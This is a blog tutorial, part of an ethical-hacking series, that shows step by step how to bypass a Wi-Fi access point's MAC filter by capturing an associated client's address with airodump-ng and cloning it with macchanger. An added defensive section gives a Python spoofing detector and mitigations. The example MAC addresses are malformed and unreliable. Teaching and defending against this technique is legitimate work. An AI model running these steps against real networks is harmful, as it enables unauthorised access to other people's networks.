Ethical Hacking with Kali Linux - Part 3: Bypassing the MAC Address Filter
Welcome all, to this series of Kali Linux for Ethical Hacking. This is the third part, and I'll explain the process of bypassing the MAC address filter on an AP (Access Point).
# The Basic Process (3 steps):
- Finding the AP: airmon-ng & airodump-ng
- Finding an associated client: airodump-ng
- Finally, using the MACchanger
# Let's Begin
- Before starting, make sure that eth0, lo and wlan0 are up (open a terminal and run ifconfig).
- Start monitor mode on the wireless interface. Run:
airmon-ng start wlan0
- After executing the above command, you should get a new interface, mon0 (monitor mode enabled).
- Verify that both interfaces are up and running. Run:
airmon-ng
- Watch for wlan0 and mon0. Then, to monitor all the APs that Kali Linux can see, run:
airodump-ng mon0
- In the output you'll get the BSSID, ESSID, channel and cipher of each AP. If an SSID is hidden, the ESSID column will show something like <length: 0>, or no SSID at all.
Note: We saw in the second part how to uncover a hidden SSID. Here you can use any SSID with open encryption, or an SSID with a known password.
- We will use the MAC address that was seen in part 2, i.e. 00:A1:B2:11:20:13:5T, and channel 1. (Assume MAC address filtering is enabled on this AP, and suppose its SSID is nhc-BJ.)
- Now we try to find a client associated with this AP (nhc-BJ) and its MAC address, so we can use that MAC to bypass the filter. Run:
airodump-ng -c 1 -a --bssid 00:A1:B2:11:20:13:5T mon0
(-c is the channel; it is 1 for the BSSID we're trying to connect to. -a shows only the clients associated with this BSSID.)
- You'll get the MAC address of the station associated with that AP; this is the client's station. (Let's assume its MAC is 00:C1:52:11:20:13:7D.)
- Press CTRL+C.
- Run:
macchanger --help
(Notice that -m sets the MAC.)
- Run:
macchanger -m 00:C1:52:11:20:13:7D wlan0
(If you get a "device or resource busy" error, then run the following command:)
airmon-ng stop wlan0
- Run:
macchanger -m 00:C1:52:11:20:13:7D wlan0
(If successful, you'll see a message like 'faked MAC'.)
- Run:
ifconfig wlan0 down
ifconfig wlan0 up
(Let's see whether we can associate with the SSID now, using this faked MAC.)
- Run:
iwconfig wlan0 essid nhc-BJ channel 1
(If it does not work in Kali, try it in BackTrack, or use an updated version of Kali.)
- To check the result, run:
iwconfig wlan0
(If successful, the Access Point will be associated.)
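The walkthrough above shows why a MAC allow-list on an AP is not an authentication control: the filter only checks a field that the client itself writes into the frame header. As an added example (not from the original post), here is a small detector a defender could run over per-frame metadata from a monitor-mode capture to spot a MAC address that is being transmitted by more than one radio. It uses two signals: the 802.11 sequence number, which a single radio advances in small steps, and the received signal strength, which drifts slowly for one physical station. The frame records, the thresholds and the locally administered address 02:00:00:00:00:01 are constructed for this example; 00:C1:52:11:20:13:7D is the client MAC from the walkthrough.

```python
from collections import defaultdict
from dataclasses import dataclass

SEQ_MODULO = 4096        # the 802.11 sequence number is a 12-bit counter
MAX_FORWARD_GAP = 256    # one radio advances its counter in small steps per frame
REORDER_TOLERANCE = 8    # frames captured slightly out of order are not a finding
RSSI_SWING_DBM = 20      # larger jumps between consecutive frames suggest two radios


@dataclass
class Frame:
    """Per-frame metadata a monitor-mode capture exposes for a transmitting station."""
    ts: float   # capture timestamp in seconds
    src: str    # transmitter MAC address from the frame header
    seq: int    # 802.11 sequence number (0..4095)
    rssi: int   # received signal strength in dBm


def sequence_gap_anomalous(prev_seq: int, seq: int) -> bool:
    """True when `seq` is not a plausible successor of `prev_seq` for one radio.

    One radio increments its counter by one per frame (modulo 4096), so the
    forward distance between consecutive frames stays small, wrap included.
    Two radios sharing a MAC interleave two independent counters, which shows
    up as large forward or backward jumps.
    """
    step = (seq - prev_seq) % SEQ_MODULO
    if step <= MAX_FORWARD_GAP:
        return False                       # normal progression (includes 4095 -> 0)
    if step >= SEQ_MODULO - REORDER_TOLERANCE:
        return False                       # minor reordering in the capture
    return True


def find_suspicious_stations(frames):
    """Return {mac: {"seq_discontinuities": n, "rssi_swings": m}} for MACs that
    look like they are being transmitted by more than one radio."""
    by_mac = defaultdict(list)
    for frame in sorted(frames, key=lambda f: f.ts):
        by_mac[frame.src].append(frame)

    findings = {}
    for mac, station_frames in by_mac.items():
        pairs = list(zip(station_frames, station_frames[1:]))
        seq_jumps = sum(1 for a, b in pairs if sequence_gap_anomalous(a.seq, b.seq))
        rssi_swings = sum(1 for a, b in pairs if abs(a.rssi - b.rssi) > RSSI_SWING_DBM)
        if seq_jumps or rssi_swings:
            findings[mac] = {"seq_discontinuities": seq_jumps, "rssi_swings": rssi_swings}
    return findings


# Constructed sample capture (not real traffic).
SAMPLE_FRAMES = [
    # A legitimate station: monotonic counter, stable RSSI, including the
    # wrap of the 12-bit counter from 4095 back to 0.
    Frame(0.00, "02:00:00:00:00:01", 4093, -52),
    Frame(0.10, "02:00:00:00:00:01", 4094, -53),
    Frame(0.20, "02:00:00:00:00:01", 4095, -51),
    Frame(0.30, "02:00:00:00:00:01", 0, -52),
    Frame(0.40, "02:00:00:00:00:01", 1, -52),
    # The allow-listed MAC from the walkthrough, now seen from two radios:
    # the real client (seq around 100, about -45 dBm) and a second device
    # that copied its address (seq around 3000, about -72 dBm).
    Frame(1.00, "00:C1:52:11:20:13:7D", 100, -45),
    Frame(1.05, "00:C1:52:11:20:13:7D", 101, -46),
    Frame(1.10, "00:C1:52:11:20:13:7D", 3000, -72),
    Frame(1.15, "00:C1:52:11:20:13:7D", 102, -45),
    Frame(1.20, "00:C1:52:11:20:13:7D", 3001, -73),
]

if __name__ == "__main__":
    for mac, detail in find_suspicious_stations(SAMPLE_FRAMES).items():
        print(f"{mac}: {detail}")
```

Run as-is, the script reports only 00:C1:52:11:20:13:7D, with three sequence discontinuities and three RSSI swings, and stays silent on the legitimate station. The thresholds need tuning per environment, and a production detector should also group by TID, because QoS data frames keep a separate sequence counter per traffic class. The actual mitigation is to stop treating the MAC address as a credential: require WPA2 or WPA3 with a strong passphrase, or 802.1X where the AP supports it, and keep the allow-list as a convenience rather than a control.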
A quick note: This series is only for educational purposes. Practice this series in a lab, on a virtual/separate network, and always avoid illegal activities. If you can, support us in fighting the bad guys.
See the other posts in this series:
Ethical Hacking with Kali Linux - Part 1: Objective
Ethical Hacking with Kali Linux - Part 2: Finding Hidden SSIDs
Ethical Hacking with Kali Linux - Part 4: Breaking WPA2 Wireless
Ethical Hacking with Kali Linux - Part 5: Rogue Wireless Access Points
Ethical Hacking with Kali Linux - Part 6: Nmap (Network Mapper)
By: BIJAY ACHARYA (Twitter: @acharya_bijay)